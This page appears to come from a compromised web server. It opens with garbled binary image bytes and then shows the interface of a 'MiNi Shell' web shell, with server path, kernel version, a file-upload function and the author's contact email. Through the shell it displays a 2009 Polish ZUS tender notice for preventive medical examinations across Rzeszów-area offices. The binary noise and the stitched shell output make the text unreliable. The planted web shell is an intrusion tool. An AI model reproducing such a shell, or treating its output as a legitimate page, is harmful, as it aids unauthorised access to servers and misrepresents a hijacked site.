JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23294-N-2009.html

<p class="kh_header"><b>Rzeszów: Wykonywanie badań profilaktycznych pracowników O/ZUS w Rzeszowie i podległych Inspektoratów.</b><br>
<b>Numer ogłoszenia: 23294 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Rzeszowie , Al. Piłsudskiego 12, 35-075 Rzeszów, woj. podkarpackie, tel. 017 8675000, faks 017 8523638.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie badań profilaktycznych pracowników O/ZUS w Rzeszowie i podległych Inspektoratów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Wykonywanie badań profilaktycznych pracowników O/ZUS w Rzeszowie i podległych Inspektoratów.
1. Badania profilaktyczne przeprowadzane będą na podstawie skierowania wydanego przez pracodawcę.
2. Skierowanie, będzie zawierać:
a) określenie stanowiska pracy, na którym osoba ta ma być zatrudniona,
b) określenie stanowiska pracy, na którym pracownik jest zatrudniony,
c) informacje o występowaniu na stanowisku lub stanowiskach pracy, czynników szkodliwych dla zdrowia lub warunków uciążliwych.
3. Pracownik stawiający się ze skierowaniem od pracodawcy otrzymuje skierowania na badania wymagane na danym stanowisku pracy, wystawione przez Zakład Medycyny Pracy lub Lekarza Profilaktyka.
4. Wykonanie badań nastąpi w wcześniej określonym terminie ustalonym ze Zleceniobiorcą.
a) W Oddziale, Inspektoratach, Biurze Terenowym zostanie wyznaczona osoba odpowiedzialna za ustalenie terminów wykonywania badań w zależności od ilości pracowników mających wykonać badania profilaktyczne.
b) Poszczególne Inspektoraty lub Biuro Terenowe, będą wykonywać badania laboratoryjne w odrębnych terminach.
c) Zleceniobiorca będzie przeprowadzał badania laboratoryjne nie później niż 7-8 rano.
5. Zakres badań wstępnych, okresowych i kontrolnych należy wykonać zgodnie z Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. Nr 69, poz. 332 z późn. zm.), zwanego dalej Rozporządzeniem, przy czym dostępny dla każdego pracownika zakres badań okresowych  i wstępnych powinien obejmować:
a) badanie lekarskie i wydanie orzeczenia,
b) badanie moczu,
c) badanie morfologiczne krwi,
d) OB.,
e) badanie poziomu glukozy we krwi,
f) cholesterolu,
g) badanie okulistyczne,
h) inne badania wg decyzji lekarza po uwzględnieniu wskazanych w skierowaniu informacji o zagrożeniach związanych z pracą, np.- RTG klatki piersiowej,
i) badanie neurologiczne,
j) badanie laryngologiczne,
k) spirometr,
l) audiometr,
m) EKG,
6. W sytuacji, gdy osoba skierowana przez Zamawiającego przedstawi aktualne badanie lekarskie, orzeczenie lekarskie może być wydane bez potrzeby przeprowadzania badań wymienionych w pkt 5. Orzeczenie lekarskie może być wydane z pominięciem niektórych badań wymienionych w pkt 5, gdy ich wykonanie nie jest uzasadnione rodzajem pracy osoby kierowanej i stanem jej zdrowia.
7. Wykonawca winien zapewnić udział lekarza profilaktyka w jednodniowych posiedzeniach w Rzeszowie, w siedzibie Oddziału.
8. Zleceniobiorca zrefunduje przeprowadzenie badań profilaktycznych pracowników, którzy z przyczyn od nich niezależnych (urlop, choroba, podróż służbowa itp.), nie mogli ich wykonać w wyznaczonym terminie i rozliczy te koszty w cenach ustalonych w umowie.
a) Faktury za te badania wykonane w innych Zakładach Medycyny Pracy zostaną przekazane do Zleceniobiorcy.
9. Zakład Medycyny Pracy lub Lekarze przeprowadzający badania profilaktyczne prowadzą dokumentację medyczną, która obejmuje:
a) kartę badania profilaktycznego,
b) rejestr wydanych zaświadczeń.
10. W przypadkach szczególnych, gdy wykonawca z przyczyn niezależnych (choroba Lekarza Medycyny Pracy itp.),  nie może realizować postanowień zawartych w umowie, musi zapewnić przeprowadzenie badań profilaktycznych poprzez zlecenie wykonania tych czynności jednostce zewnętrznej. Zleceniobiorca powinien również pokryć koszty poniesione przez pracowników ZUS na podstawie przedstawionej faktury, którzy przeprowadzili badania w innych zakładach Medycyny Pracy, niezależnie od wysokości kwot za badania profilaktyczne wykonane przez jednostki zewnętrzne. Zleceniobiorca rozlicza fakturę na warunkach przyjętych w umowie.
11. Zleceniobiorca wystawia fakturę za przeprowadzone badania profilaktyczne z załączonym wykazem pracowników ZUS Oddział w Rzeszowie, którym wykonano badania. Wykaz ten powinien zawierać szczegółowe informacje co do rodzaju wykonanych badań.
12. Zleceniobiorca wykonywał będzie badania okulistyczne: 
a)	komputerowe badanie wzroku,
b) badanie dna oka.
Po stwierdzeniu wady wzroku u badanego pracownika Lekarz Okulista wydaje stosowne zaświadczenie oraz receptę do zakładu optycznego, celem zakupu okularów korygujących wzrok
13.Badania profilaktyczne pracowników danej jednostki terenowej ZUS Oddział  w Rzeszowie, winny być wykonywane w mieście będącym siedzibą tej jednostki.
Badania będą wykonywane w:
1.     Oddziale ZUS  w Rzeszowie, Al. J. Piłsudskiego 12,	część I zamówienia,
2.	Inspektoracie ZUS w Mielcu, ul. Sikorskiego 4,   	część II zamówienia,
3. 	Inspektoracie ZUS w Przemyślu, ul. Brodzińskiego 6,	część III zamówienia,
4.	Inspektoracie ZUS w Tarnobrzegu, ul. Sienkiewicza 145D,część IV zamówienia,
5.	Inspektoracie ZUS w Jarosławiu, ul. Słowackiego 21,	część V zamówienia,
6.	Inspektoracie ZUS w Leżajsku, ul. M.C. Skłodowskiej	część VI zamówienia,
7.	Inspektoracie ZUS w Stalowej Woli, ul.Popiełuszki 8	część VII zamówienia,
8.	Inspektoracie ZUS w Przeworsku, ul. Dworcowej 1,	część VIII zamówienia,
9.	Biurze Terenowym w Lubaczowie, ul. Legionów 4	część IX zamówienia.

Zamawiający dopuszcza składanie ofert częściowych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.50.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie  przewiduje wpłaty wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych,
Na potwierdzenie spełnienia warunku określonego w pkt 4.1. Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych (formularz oświadczenia został określony załącznikiem nr 2 do SIWZ) oraz na potwierdzenia posiadania uprawnień do wykonywania działalności w zakresie objętym zamówieniem (art. 22 ust. 1 pkt 1 ustawy) przedstawi:
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert, wpis do Rejestru Zakładów Opieki Zdrowotnej właściwego Wojewody.
- oświadczenie Wykonawcy o dysponowaniu osobami posiadającymi uprawnienia do wykonywania działalności w zakresie przedmiotu zamówienia - medycyny pracy, okulistyki, laryngologii i neurologii.
1.2. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy - Prawo zamówień publicznych,
Na potwierdzenie spełnienia warunku określonego w pkt 4.2. Wykonawca złoży oświadczenie, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy - Prawo zamówień publicznych (formularz oświadczenia został określony załącznikiem nr 3 do SIWZ) oraz:
-  zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca  nie zalega z opłacaniem podatków, opłat , lub zaświadczenie , że uzyskał przewidzianą prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 
7. zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne , lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert.

Zamawiający dokona oceny spełniania warunków metodą O (nie spełnia)
- 1 (spełnia) na podstawie złożonych dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.1. spełniają warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych,
Na potwierdzenie spełnienia warunku określonego w pkt 4.1. Wykonawca złoży oświadczenie, że spełnia warunki określone w art. 22 ust. 1 ustawy - Prawo zamówień publicznych (formularz oświadczenia został określony załącznikiem nr 2 do SIWZ) oraz na potwierdzenia posiadania uprawnień do wykonywania działalności w zakresie objętym zamówieniem (art. 22 ust. 1 pkt 1 ustawy) przedstawi:
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert, wpis do Rejestru Zakładów Opieki Zdrowotnej właściwego Wojewody.
- oświadczenie Wykonawcy o dysponowaniu osobami posiadającymi uprawnienia do wykonywania działalności w zakresie przedmiotu zamówienia - medycyny pracy, okulistyki, laryngologii i neurologii.
1.2. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy - Prawo zamówień publicznych,
Na potwierdzenie spełnienia warunku określonego w pkt 4.2. Wykonawca złoży oświadczenie, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy - Prawo zamówień publicznych (formularz oświadczenia został określony załącznikiem nr 3 do SIWZ) oraz:
-  zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca  nie zalega z opłacaniem podatków, opłat , lub zaświadczenie , że uzyskał przewidzianą prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 
7. zaświadczenie właściwego oddziału ZUS lub KRUS potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne , lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert.

Zamawiający dokona oceny spełniania warunków metodą O (nie spełnia)
- 1 (spełnia) na podstawie złożonych dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZUS Oddział w Rzeszowie pok. 2, budynek ul. Siemiradzkiego 8..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2009 godzina 10:00, miejsce: W siedzibie Zamawiającego w Rzeszowie przy   Al. Piłsudskiego 12 pok. 23 - Dziennik Podawczy.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Do bezpośredniego kontaktowania się z Wykonawcami w godzinach od 8.00 do 14.00 zostają wyznaczone osoby: w sprawach dotyczących przedmiotu zamówienia : Inspektor ds. BHP i PPOŻ - Łukasz Wilk pok.  11, ul. Siemiradzkiego 8 tel. 0 17 / 86 75 281 (NH), oraz w pozostałych sprawach  mgr Janusz Żebracki - Starszy Inspektor, pok. 2, budynek ul. Siemiradzkiego 8, tel. 0 17 / 86 75 088 (TZ).</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Oddziale ZUS  w Rzeszowie, Al. J. Piłsudskiego 12,	część I zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj badania	Planowana ilość wykonanych badań
Badanie lekarskie i wydanie orzeczenia	455
Badanie moczu	455
Badanie morfologiczne krwi	455
OB.	455
Badanie okulistyczne	455
RTG płuc	150
Cholesterol	455
Badanie poziomu glukozy we krwi	455
Badanie neurologiczne	25
Badanie laryngologiczne	30
Spirometr	10
Audiometr	30
EKG	20.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.50.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Inspektorat ZUS w Mielcu, ul. Sikorskiego 4	
część II zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj badania	Planowana ilość wykonanych badań
Badanie lekarskie i wydanie orzeczenia	70
Badanie moczu	70
Badanie morfologiczne krwi	70
OB.	70
Badanie okulistyczne	70
RTG płuc	20
Cholesterol	70
Badanie poziomu glukozy we krwi	70
Badanie neurologiczne	5
Badanie laryngologiczne	10
Spirometr	5
Audiometr	10
EKG	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.50.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Inspektorat ZUS w Przemyślu, ul. Brodzińskiego 6,	część III zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj badania	Planowana ilość wykonanych badań
Badanie lekarskie i wydanie orzeczenia	85
Badanie moczu	85
Badanie morfologiczne krwi	85
OB.	85
Badanie okulistyczne	85
RTG płuc	20
Cholesterol	85
Badanie poziomu glukozy we krwi	85
Badanie neurologiczne	10
Badanie laryngologiczne	10
Spirometr	5
Audiometr	10
EKG	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.50.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Inspektorat ZUS w Tarnobrzegu, ul. Sienkiewicza 145D,część IV zamówienia,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj badania	Planowana ilość wykonanych badań
Badanie lekarskie i wydanie orzeczenia	25
Badanie moczu	25
Badanie morfologiczne krwi	25
OB.	25
Badanie okulistyczne	25
RTG płuc	10
Cholesterol	25
Badanie poziomu glukozy we krwi	25
Badanie neurologiczne	5
Badanie laryngologiczne	5
Spirometr	5
Audiometr	5
EKG	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.50.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Inspektorat ZUS w Jarosławiu, ul. Słowackiego 21,	część V zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj badania	Planowana ilość wykonanych badań
Badanie lekarskie i wydanie orzeczenia	47
Badanie moczu	47
Badanie morfologiczne krwi	47
OB.	47
Badanie okulistyczne	47
RTG płuc	15
Cholesterol	47
Badanie poziomu glukozy we krwi	47
Badanie neurologiczne	5
Badanie laryngologiczne	5
Spirometr	5
Audiometr	5
EKG	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.50.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Inspektorat ZUS w Leżajsku, ul. M.C. Skłodowskiej	część VI zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj badania	Planowana ilość wykonanych badań
Badanie lekarskie i wydanie orzeczenia	37
Badanie moczu	37
Badanie morfologiczne krwi	37
OB.	37
Badanie okulistyczne	37
RTG płuc	10
Cholesterol	37
Badanie poziomu glukozy we krwi	37
Badanie neurologiczne	5
Badanie laryngologiczne	5
Spirometr	5
Audiometr	5
EKG	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.50.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Inspektorat ZUS w Stalowej Woli, ul.Popiełuszki 8	część VII zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj badania	Planowana ilość wykonanych badań
Badanie lekarskie i wydanie orzeczenia	25
Badanie moczu	25
Badanie morfologiczne krwi	25
OB.	25
Badanie okulistyczne	25
RTG płuc	10
Cholesterol	25
Badanie poziomu glukozy we krwi	25
Badanie neurologiczne	5
Badanie laryngologiczne	5
Spirometr	5
Audiometr	5
EKG	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.50.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Inspektorat ZUS w Przeworsku, ul. Dworcowej 1,	część VIII zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj badania	Planowana ilość wykonanych badań
Badanie lekarskie i wydanie orzeczenia	80
Badanie moczu	80
Badanie morfologiczne krwi	80
OB.	80
Badanie okulistyczne	80
RTG płuc	20
Cholesterol	80
Badanie poziomu glukozy we krwi	80
Badanie neurologiczne	10
Badanie laryngologiczne	10
Spirometr	5
Audiometr	10
EKG	5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.50.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Biurze Terenowym w Lubaczowie, ul. Legionów 4	część IX zamówienia.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj badania	Planowana ilość wykonanych badań
Badanie lekarskie i wydanie orzeczenia	20
Badanie moczu	20
Badanie morfologiczne krwi	20
OB.	20
Badanie okulistyczne	20
RTG płuc	10
Cholesterol	20
Badanie poziomu glukozy we krwi	20
Badanie neurologiczne	5
Badanie laryngologiczne	5
Spirometr	3
Audiometr	5
EKG	3.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.14.50.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com